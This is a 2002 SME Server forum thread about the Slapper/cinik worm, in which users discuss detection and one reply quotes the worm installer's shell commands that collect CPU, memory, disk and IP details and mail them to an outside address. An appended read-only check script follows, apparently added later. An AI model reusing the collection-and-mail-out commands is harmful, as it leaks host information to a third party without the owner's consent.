Koozali.org: home of the SME Server

worm

gabe

worm
« on: October 01, 2002, 09:00:56 PM »
Hello everybody.

I'm infected by a WORM.
What do I have to do?

1. Update to 5.5?

2. Make a backup, format, install 5.5 and restore?


Thanks for your answers.

PS: sorry for my bad English, it's not my language.

eric

Re: worm
« Reply #1 on: October 03, 2002, 06:51:04 AM »
If it's the Slapper worm, look in the /tmp directory with ls -a to view hidden files.

AlecN

Re: worm
« Reply #2 on: October 03, 2002, 01:52:04 PM »
If it's not a rude question, what should I see there? I see session_mm.sem.
Is that OK?

gabe

Re: worm
« Reply #3 on: October 03, 2002, 04:12:44 PM »
I had a look at the /tmp directory, and I see some .cinik files.

If I delete those files, is it enough to remove this "VIRUS"?

Bud

Re: worm
« Reply #4 on: October 03, 2002, 08:46:59 PM »
SME doesn't have any gcc compiler tools (unless you manually added them), so the virus can't compile itself on your system.

Now I understand why you should NEVER have any compiler tools running on a production system. It gives you another level of security.

gabe

Re: worm
« Reply #5 on: October 03, 2002, 10:58:35 PM »
The thing I don't understand is this:
I have no cc compiler on my system, but the worm sends email; I saw that I was infected because of undelivered message returns to my admin box.
If no cc or gcc compiler is installed on my system, how can the worm use my mail server?

Lightman

Re: worm
« Reply #6 on: October 04, 2002, 12:00:29 AM »
Hi gabe

The worm didn't send that mail, the script used to install the worm did that.

Here is a copy of the part of the install script that does that:

The first part is to collect machine info:

echo PROC > /tmp/.cinik.status       # get machine data
cat /proc/cpuinfo >> /tmp/.cinik.status
echo MEM >> /tmp/.cinik.status
/usr/bin/free >> /tmp/.cinik.status
echo HDD >> /tmp/.cinik.status       # get partitions/disks, etc.
/bin/df -h >> /tmp/.cinik.status
echo IP >> /tmp/.cinik.status        # ifconfig, ip addresses, nets
/sbin/ifconfig >> /tmp/.cinik.status

Then it sends the mail to the above address and then erases that file:

myip=`/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`
mail cinik_worm@yahoo.com -s "$myip" < /tmp/.cinik.status
rm -f /tmp/.cinik.status


In my case, I thought that the worm was operational, but I have no gcc,
so even if the script sends the email it doesn't mean that you are effectively
infected.

Still, I'm not sure if I'm infected with cinik or not. It seems that it's not
infected; I tried to connect to the ports mentioned in the source code of
the worm but it didn't work, so it's highly probable that the worm couldn't
compile.

see you

Leo
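The checks suggested in Replies #1, #4 and #6 (hidden files in /tmp, the .cinik* names the installer excerpt writes, and whether a C compiler is even present), collected into one read-only script. This is an added example, not code from the thread or from SME Server; the function names check_tmp and compiler_present are hypothetical, and the sample directory it inspects is constructed on the fly so it runs without a real infection.

```shell
#!/bin/sh
# Added example, not from the thread: a read-only check along the lines of
# Replies #1, #4 and #6. Hypothetical helper names (check_tmp, compiler_present).

# check_tmp DIR: list hidden entries in DIR (default /tmp, as in Reply #1).
# Returns 1 if any .cinik* name (the files the installer excerpt writes) is present.
check_tmp() {
    dir="${1:-/tmp}"
    found=0
    for f in "$dir"/.[!.]*; do
        [ -e "$f" ] || continue          # the glob matched nothing
        case "$(basename "$f")" in
            .cinik*) echo "SUSPECT: $f"; found=1 ;;
            *)       echo "hidden:  $f" ;;
        esac
    done
    return "$found"
}

# compiler_present: succeed if gcc or cc is on PATH (Reply #4: without one,
# source dropped in /tmp cannot be built on the box).
compiler_present() {
    command -v gcc >/dev/null 2>&1 || command -v cc >/dev/null 2>&1
}

# Constructed sample directory so the check runs without a real infection.
demo=$(mktemp -d)
: > "$demo/session_mm.sem"    # the name from Reply #2; not a dot file, so not listed
: > "$demo/.cinik.status"     # the inventory file from Lightman's excerpt
: > "$demo/.unrelated"        # an ordinary hidden file, listed but not flagged

if check_tmp "$demo"; then
    echo "no .cinik files in $demo"
else
    echo ".cinik files present in $demo: check /tmp with ls -a on the real box"
fi
if compiler_present; then
    echo "gcc or cc is on PATH: dropped source could be compiled here"
else
    echo "no gcc or cc on PATH"
fi
rm -rf "$demo"
```

Run it as-is to see the constructed case, or call check_tmp with no argument to inspect the real /tmp; finding .cinik* files shows the installer ran, and the compiler check tells you whether it could have built anything.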

gabe

Re: worm
« Reply #7 on: October 04, 2002, 09:06:59 PM »
Thanks to everybody for your answers.